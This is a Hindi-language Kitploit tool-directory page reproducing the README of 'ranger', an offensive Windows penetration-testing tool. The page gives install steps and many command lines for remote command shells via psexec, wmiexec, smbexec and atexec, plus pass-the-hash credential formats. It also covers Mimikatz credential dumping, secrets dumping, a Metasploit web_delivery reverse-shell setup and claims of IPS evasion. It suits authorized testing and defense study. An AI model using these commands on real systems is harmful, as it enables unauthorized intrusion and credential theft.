Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ranger — सुरक्षा पेशेवरों के लिए एक उपकरण जो रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुँचने और उनके साथ बातचीत करने के लिए है। | Kitploit
उपकरण/GitHubGitHub/funkandwagnalls/ranger
पेलोड जनरेशनशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubfunkandwagnalls/ranger

ranger

सुरक्षा पेशेवरों के लिए एक उपकरण जो रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुँचने और उनके साथ बातचीत करने के लिए है।

रिपॉजिटरी देखें
431828 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ranger

सुरक्षा पेशेवरों को रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुंचने और उनके साथ बातचीत करने में सहायता करने के लिए एक उपकरण।

यह परियोजना इस सोच के साथ बनाई गई थी, हमने धनुष या तीर का आविष्कार नहीं किया, बल्कि इसका उपयोग करने का एक अधिक कुशल तरीका बनाया।

Ranger एक कमांड-लाइन संचालित हमले और पैठ परीक्षण उपकरण है, जिसमें विंडोज सिस्टम के खिलाफ क्षमताओं को वितरित करने के लिए एक तत्काल कैटपल्ट सर्वर का उपयोग करने की क्षमता है। जब तक किसी उपयोगकर्ता के पास क्रेडेंशियल्स या हैश सेट (NTLM, LM, LM:NTLM) होता है, वह उन सिस्टमों तक पहुंच प्राप्त कर सकता है जो ट्रस्ट का हिस्सा हैं।

इस क्षमता का उपयोग करके एक सुरक्षा पेशेवर मेमोरी से क्लियर-टेक्स्ट में क्रेडेंशियल्स निकाल सकता है, SAM टेबल्स तक पहुंच सकता है, कमांड चला सकता है, PowerShell स्क्रिप्ट, विंडोज बाइनरी, और अन्य उपकरण निष्पादित कर सकता है। इस समय, यह उपकरण अधिकांश IPS विक्रेता समाधानों को बायपास करता है जब तक कि उन्हें विशेष रूप से इसका पता लगाने के लिए ट्यून नहीं किया गया हो। यह उपकरण हमारे होम लैब्स का उपयोग करके विकसित किया गया था, ताकि कानूनी और/या अनुबंधित रूप से समर्थित गतिविधियों को करने वाले सुरक्षा पेशेवरों का समर्थन किया जा सके।

अधिक कार्यक्षमता जोड़ी जा रही है, लेकिन इस समय यह उपकरण PowerShell PowerView, PowerShell Mimikatz और Impacket टीमों से संबंधित रिपॉजिटरी के समुदाय योगदानों का उपयोग करता है।

Ranger प्रबंधित करना:

इंस्टॉल:

root@kitploit:~
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

अपडेट:

root@kitploit:~
ranger --update

उपयोग:

  • Ranger विधियों और हमलों का एक संयोजन उपयोग करता है, एक विधि का उपयोग हमले/कमांड को वितरित करने के लिए किया जाता है
  • एक हमला वह है जो आप पूरा करने का प्रयास कर रहे हैं
  • कुछ आइटम एक ही समय में एक विधि और हमला दोनों होते हैं और कुछ विधियां लाइब्रेरी या प्रोटोकॉल में वर्तमान सीमाओं के कारण कुछ हमलों का उपयोग नहीं कर सकती हैं

विधियां और हमले:

root@kitploit:~
--scout
--secrets-dump

विधि:

root@kitploit:~
--wmiexec
--psexec
--smbexec
--atexec

हमला:

root@kitploit:~
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

##कमांड निष्पादन: ###लॉग इन उपयोगकर्ता खोजें:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

###SMBEXEC कमांड शेल:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

###PSEXEC कमांड शेल:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

###PSEXEC कमांड निष्पादन:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

###WMIEXEC कमांड निष्पादन:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

###WMIEXEC PowerShell Mimikatz मेमोरी इंजेक्टर:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

###WMIEXEC Metasploit web_delivery मेमोरी इंजेक्टर (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

###WMIEXEC कस्टम कोड मेमोरी इंजेक्टर:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"

###ATEXEC कमांड निष्पादन:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

###ATEXEC PowerShell Mimikatz मेमोरी इंजेक्टर:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

###ATEXEC Metasploit web_delivery मेमोरी इंजेक्टर (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

###ATEXEC कस्टम कोड मेमोरी इंजेक्टर:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder

###SECRETSDUMP कस्टम कोड मेमोरी इंजेक्टर:

root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

###पेस्ट करने योग्य Mimikatz हमला बनाएं:

root@kitploit:~
ranger.py --invoker -q -v -vv -vvv

###पेस्ट करने योग्य web_delivery हमला बनाएं (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):

root@kitploit:~
ranger.py --downloader -q -v -vv -vvv

###पेस्ट करने योग्य Executor हमला बनाएं:

root@kitploit:~
ranger.py --executor -q -v -vv -vvv

समूह सदस्यों और डोमेन की पहचान

  • समूहों की पहचान करते समय सुनिश्चित करें कि --get-domain-membership के साथ वास्तविक क्वेरी डोमेन का निर्धारण करें
  • फिर जब आप एक समूह से क्वेरी करते हैं तो वैकल्पिक --domain का उपयोग करें, जो आपको उस डोमेन से अलग डोमेन को लक्षित करने की अनुमति देता है जिसमें आपने लॉगिन किया था
root@kitploit:~
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

##उपयोग के बारे में नोट्स: ###क्रेड फ़ाइल फ़ॉर्मेट:

  • आप इसे उपयोगकर्ता नामों और पासवर्ड या हैश की एक सूची निम्नलिखित प्रारूप में एक ही फ़ाइल में पास कर सकते हैं:
root@kitploit:~
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM  domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain

###क्रेडेंशियल फ़ाइल चेतावनियां:

  • यदि आप फ़ाइल में डोमेन नाम प्रदान करते हैं तो वे डिफ़ॉल्ट WORKGROUP के बजाय उपयोग किए जाएंगे।
  • यदि आप कमांड लाइन -d के माध्यम से डोमेन नाम प्रदान करते हैं, तो यह अनुमान लगाएगा कि आप फ़ाइल में सभी डोमेन नामों को अनदेखा करना चाहते हैं।

###कमांड लाइन निष्पादन:

  • यदि आप फ़ाइल का उपयोग नहीं करना चाहते हैं तो आप विवरण सीधे कमांड लाइन के माध्यम से पास कर सकते हैं।
  • यदि आप पासवर्ड के बजाय हैश प्रदान करना चाहते हैं तो उन्हें पासवर्ड तर्क के माध्यम से पास करें।
  • यदि वे PWDUMP प्रारूप में हैं और आप कोई उपयोगकर्ता नाम प्रदान नहीं करते हैं तो यह हैश से उपयोगकर्ता नाम निकाल लेगा।
  • यदि आप एक उपयोगकर्ता नाम प्रदान करते हैं तो यह सोचेगा कि समान हैश एक अलग उपयोगकर्ता पर लागू होता है।
  • पासवर्ड के लिए निम्नलिखित प्रारूपों का उपयोग करें:
root@kitploit:~
password
LM:NTLM
:NTLM
PWDUMP

###लक्ष्य और बहिष्करण:

  • लक्ष्य और बहिष्करण एक ही समय में उपयोग किए जा सकते हैं

####लक्ष्य, लक्ष्य श्रेणियाँ, लक्ष्य CIDRs, लक्ष्य सूचियाँ, NMAP XML लक्ष्य:

  • आप लक्ष्य सूची या लक्ष्य विकल्प के माध्यम से लक्ष्यों की एक सूची प्रदान कर सकते हैं।
  • आप अल्पविराम द्वारा अलग करके कई लक्ष्य सूची फ़ाइलें प्रदान कर सकते हैं और यह डेटा को एकत्रित करेगा और डुप्लिकेट हटा देगा और फिर आपके IP पते को डिफ़ॉल्ट इंटरफ़ेस या आपके द्वारा प्रदान किए गए इंटरफ़ेस से बाहर कर देगा।
  • उपकरण CIDR नोटेशन, छोटी श्रेणियाँ (192.168.195.1-100) या बड़ी श्रेणियाँ (192.168.194.1-192.163.1.1) या एकल IP पते स्वीकार करता है।
  • फिर से, बस उन्हें कमांड लाइन द्वारा अल्पविराम से अलग करें या उन्हें एक नई पंक्ति द्वारा सीमांकित फ़ाइल में रखें।
  • Nmap XML का उपयोग सिस्टम को लक्षित करने के लिए भी किया जा सकता है, इसे भी अल्पविराम द्वारा अलग किया जा सकता है
  • उपकरण बक्सों को लक्षित करने से पहले सामान्यीकृत करेगा और डुप्लिकेट हटा देगा
  • उदाहरण: -t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml

####बहिष्करण, बहिष्करण श्रेणियाँ, बहिष्करण CIDRs, बहिष्करण सूचियाँ, Nmap XML बहिष्करण:

  • आप बहिष्करण तर्कों का उपयोग करके लक्ष्यों को बाहर कर सकते हैं, इसलिए यदि आप क्लास A में से एक छोटे क्लास C को नहीं छूते हैं तो यह आपके लिए पता लगा लेगा।
  • बहिष्करण ठीक उसी तरह से किए जा सकते हैं जैसे लक्ष्य, बस कमांड में t को e से बदलें
  • उदाहरण: -e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml

इंट्रूज़न प्रोटेक्शन सिस्टम (IPS):

  • Mimikatz, Downloader और Executor PowerShell मेमोरी इंजेक्शन का उपयोग करते हैं, अन्य सेवाओं और प्रोटोकॉल को कॉल करके।
  • कमांड डबल-एन्कोडेड होते हैं और वर्तमान IPS समाधानों (यहां तक कि नेक्स्ट-जेन) को बायपास करते हैं जब तक कि विशेष रूप से इन हमलों को पकड़ने के लिए ट्यून न किया गया हो।
  • ATEXEC ही एकमात्र है जो वर्तमान में डिस्क पर उतरता है और एन्कोड नहीं करता है, मुझे अभी भी कुछ पुनर्लेखन करना है।

Invoker हमले:

  • लक्ष्य बॉक्स पर PowerShell Mimikatz निष्पादित करता है
  • फ़ंक्शन / cmdlet को Invoke-Mimikatz पर डिफ़ॉल्ट करता है, जिसे -f के साथ बदला जा सकता है
  • तर्कों को DumpCreds पर डिफ़ॉल्ट करता है, जिसे -a के साथ बदला जा सकता है
  • Invoker को कमांड बदलने के लिए -f और -a दोनों विकल्पों की आवश्यकता होती है, -a से बचने के लिए आप Executor का उपयोग कर सकते हैं
  • उदाहरण: -x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"

Executor हमले:

  • आपको लक्ष्य बक्सों पर बाइनरी और/या PowerShell स्क्रिप्ट चलाने की अनुमति देता है
  • स्क्रिप्ट या बाइनरी आपके हमला बॉक्स पर वर्तमान निर्देशिका में स्थित होनी चाहिए
  • स्क्रिप्ट या बाइनरी को सीधे मेमोरी में इंजेक्ट किया जाएगा
  • पेलोड (बाइनरी या स्क्रिप्ट) की पहचान -x के साथ करने की आवश्यकता है
  • फ़ंक्शन / cmdlet / तर्कों को -f द्वारा परिभाषित करने की आवश्यकता है
  • वैकल्पिक रूप से यदि उपकरण की आवश्यकता हो तो आप -a के साथ कमांड को और परिभाषित कर सकते हैं
  • उदाहरण 1: -x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"
  • उदाहरण 2: -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds

Downloader (web_delivery) हमले:

  • Metasploit को web_delivery एक्सप्लॉइट के लिए सेट अप करने के लिए Metasploit प्रारंभ करें और निम्नलिखित शर्तों को पूरा करने के लिए एक्सप्लॉइट कॉन्फ़िगर करें।
root@kitploit:~
use exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j

##FAQ

###SMBEXEC और WMIEXEC के लिए पहुंच अस्वीकृत त्रुटियाँ मुझे उन विंडोज मशीनों पर पहुंच अस्वीकृत त्रुटियाँ मिल रही हैं जो WORKGROUP का हिस्सा हैं।

जब कोई डोमेन का हिस्सा नहीं है, तो विंडोज डिफ़ॉल्ट रूप से कोई प्रशासनिक शेयर नहीं रखता है। SMBEXEC शेयरों के सक्षम होने पर निर्भर करता है। इसके अलावा, WORKGROUP मशीनों पर WMIC सक्षम नहीं है। SMBEXEC और WMIEXEC डोमेन सिस्टम पर सक्षम प्रोटोकॉल को लक्षित करने के लिए बनाए गए हैं। जबकि WORKGROUP सिस्टम पर इन कार्यों को सक्षम करना निश्चित रूप से संभव है, ध्यान दें कि आप असुरक्षित प्रोटोकॉल पेश कर रहे हैं (आखिरकार, यही इस उपकरण को हमला करने के लिए बनाया गया है)। अपने प्राथमिक घरेलू सिस्टम पर जिसका उपयोग आपका जीवनसाथी Facebook के लिए करता है, इन सुविधाओं को सक्षम करना शायद सबसे अच्छा विचार नहीं है।

  • सुनिश्चित करें कि यह एक परीक्षण बॉक्स है जो आपका है। आप यहां दिए गए निर्देशों का पालन करके शेयरों को सक्षम कर सकते हैं: http://www.wintips.org/how-to-enable-admin-shares-windows-7/
  • यदि आप यह निर्धारित करना चाहते हैं कि कौन से शेयर उजागर हैं और फिर उन्हें लक्षित करें, तो आप enum4linux जैसे उपकरण का उपयोग कर सकते हैं और फिर SMBEXEC को निष्पादित करने का प्रयास करने के लिए ranger में --share share_name तर्क का उपयोग कर सकते हैं।

भविष्य की सुविधाएँ:

रंगीन आउटपुट:

  • https://pypi.python.org/pypi/colorama के साथ रंगीन आउटपुट जोड़ना जारी रखें
  • WINDOWER – कुछ निगरानी सिस्टम से बचने के लिए विंडो को छिपाए बिना PowerShell निष्पादित करें
  • GATHERER – डोमेन समूह के लिए स्वचालित क्रेडेंशियल निकालने वाला
  • HUNTER - अर्ध-बुद्धिमान निर्णय (SID) – वर्गीकरण वृक्षों का उपयोग करके समूह सदस्यता समानताओं के आधार पर एस्केलेशन पथ की पहचान करता है
  • बेहतर NTDS और समूह पार्सिंग
  • SMB Catapult सर्वर

#धन्यवाद:

  • PowerShell के लिए Microsoft (और अग्रिम में विंडोज में bash के लिए!)
  • CoreLabs Impacket टीम को
  • PowerShellEmpire टीम को
  • PowerSploit शुरू करने वाले Mattifestation और PowerShellMafia और योगदानकर्ताओं को जो इसे विकसित करना जारी रखते हैं
  • हमारे दोस्तों और समुदाय को रचनात्मक समुदाय के लिए

प्रस्तुत किया गया:

[BSides Charm City 2016: April 23, 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)

प्रस्तुति का वीडियो:

[वीडियो] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)

वितरण जिनमें यह उपकरण शामिल है:

[Black Arch Linux] (https://blackarch.org/)

टूल डाउनलोड करें